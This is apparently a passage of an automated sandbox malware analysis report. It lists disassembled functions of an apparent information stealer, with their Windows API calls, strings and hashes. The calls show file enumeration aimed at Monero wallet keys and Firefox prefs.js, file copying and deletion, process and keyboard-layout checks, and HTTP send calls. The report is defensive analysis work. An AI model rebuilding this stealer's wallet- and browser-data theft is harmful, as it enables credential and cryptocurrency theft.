Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 19911f7e5e37e3e36ff0fcd6143bb3efe1db34675abb595fccc8f5325b370f87
Instruction ID: 4c2a1b64032e5b964e2816c8cb04e49d1ab9293029c20851c9fee46f31c220d1
Opcode Fuzzy Hash: 19911f7e5e37e3e36ff0fcd6143bb3efe1db34675abb595fccc8f5325b370f87
Instruction Fuzzy Hash: 88120D719101189AEB58EB94DC92FEEB778FF15300F5441A9B107A2891EF742F4ACF62

Function 008A3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 008A3EC3
FindFirstFileA.KERNEL32(?,?), ref: 008A3EDA
StrCmpCA.SHLWAPI(?,008B0FAC), ref: 008A3F08
StrCmpCA.SHLWAPI(?,008B0FB0), ref: 008A3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 008A406C
FindClose.KERNEL32(000000FF), ref: 008A4081

Strings

%s\%s, xrefs: 008A3EB7

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 673435004056c6b8748a95aff2a7f1e5ad735a9014f43a99022f7071703e3dec
Instruction ID: e9cfd1b751aebb339dfecef48af5f57688d590cf7ea3facee0456af96819be12
Opcode Fuzzy Hash: 673435004056c6b8748a95aff2a7f1e5ad735a9014f43a99022f7071703e3dec
Instruction Fuzzy Hash: 305164B2900218ABDB24EBF4DC85EEE737CFB54300F044589B65AD6140EB759B86CF62

Function 0089F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008B15B8,008B0D96), ref: 0089F71E
StrCmpCA.SHLWAPI(?,008B15BC), ref: 0089F76F
StrCmpCA.SHLWAPI(?,008B15C0), ref: 0089F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0089FAB1
FindClose.KERNEL32(000000FF), ref: 0089FAC3

Strings

prefs.js, xrefs: 0089F812

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: aa20877775a6d453a5d61ead1b0907f0c478eff51d1415dcd68a75a7e92768f5
Instruction ID: 8a7524556c8475b213d159b2d89ed6db815d1c3c32223c8504cf3d642e30254f
Opcode Fuzzy Hash: aa20877775a6d453a5d61ead1b0907f0c478eff51d1415dcd68a75a7e92768f5
Instruction Fuzzy Hash: 5FB162719001189BDF68FF68DC95AEE7378FF55300F4081A8A50AD6982EF346B49CB93

Function 008916D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008B510C,?,?,?,008B51B4,?,?,00000000,?,00000000), ref: 00891923
StrCmpCA.SHLWAPI(?,008B525C), ref: 00891973
StrCmpCA.SHLWAPI(?,008B5304), ref: 00891989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00891D40
DeleteFileA.KERNEL32(00000000), ref: 00891DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00891E20
FindClose.KERNEL32(000000FF), ref: 00891E32

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Strings

\*.*, xrefs: 008917F1

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: b56698465cef78e31c3f2e957da640246b3c178919b23092e46c7e06e9f282c9
Instruction ID: 1fbbebeabbe0a35ef1ef4df6a73d16f7a7973fcf6522905f565fc1eb0b19b01a
Opcode Fuzzy Hash: b56698465cef78e31c3f2e957da640246b3c178919b23092e46c7e06e9f282c9
Instruction Fuzzy Hash: 7D125F719101189BEF59FB64CC96AEE7338FF15300F4441A9A106E2991EF386F89CF92

Function 0089DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008B14B0,008B0C2A), ref: 0089DAEB
StrCmpCA.SHLWAPI(?,008B14B4), ref: 0089DB33
StrCmpCA.SHLWAPI(?,008B14B8), ref: 0089DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0089DDCC
FindClose.KERNEL32(000000FF), ref: 0089DDDE

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 15bf279b9b5cae1f31eb41f2ab72d2fbf6c30790602a4de4ba77431e986408d0
Instruction ID: b7ab7b281e91623abf64b36186bfeb142d182b00c8c1ceaad99388d5af7cb9ec
Opcode Fuzzy Hash: 15bf279b9b5cae1f31eb41f2ab72d2fbf6c30790602a4de4ba77431e986408d0
Instruction Fuzzy Hash: 159141729002049BDF18FBB4DC969EE737DFB95300F448568A85AD6941EF389B09CB93

Function 008A7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

GetKeyboardLayoutList.USER32(00000000,00000000,008B05AF), ref: 008A7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 008A7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 008A7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008A7C62
LocalFree.KERNEL32(00000000), ref: 008A7D22

Strings

/ , xrefs: 008A7C7F

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 068146ba96a47f077fd63a3e833b7820d9209f64a914d22c7671f7e50c7c01ea
Instruction ID: f460df48d2a437953b7ea12f30363d909df58f6b5f76217554238b960555df30
Opcode Fuzzy Hash: 068146ba96a47f077fd63a3e833b7820d9209f64a914d22c7671f7e50c7c01ea
Instruction Fuzzy Hash: DC41717190121CABEB24DB94DC99BEEB774FF55700F2041D9E40AA2680DB742F85CFA2

Function 0089E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,008B0D73), ref: 0089E4A2
StrCmpCA.SHLWAPI(?,008B14F8), ref: 0089E4F2
StrCmpCA.SHLWAPI(?,008B14FC), ref: 0089E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0089EBDF

Strings

\*.*, xrefs: 0089E44D

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: c3efb06fd316b62f6fae3ad6192164e569cd36c3c67994cb3d5183d54cc65c13
Instruction ID: 7fea29e59e3a005ec365390b7b947c24ef8d7f6dc7c49f15f6ec53af18e28adb
Opcode Fuzzy Hash: c3efb06fd316b62f6fae3ad6192164e569cd36c3c67994cb3d5183d54cc65c13
Instruction Fuzzy Hash: E9125E319001189AEB58FB68DC96AEE7338FF55300F4441A9B50BD6991EF386F49CB93

Function 008A9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008A961E
Process32First.KERNEL32(008B0ACA,00000128), ref: 008A9632
Process32Next.KERNEL32(008B0ACA,00000128), ref: 008A9647
StrCmpCA.SHLWAPI(?,00000000), ref: 008A965C
CloseHandle.KERNEL32(008B0ACA), ref: 008A967A

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
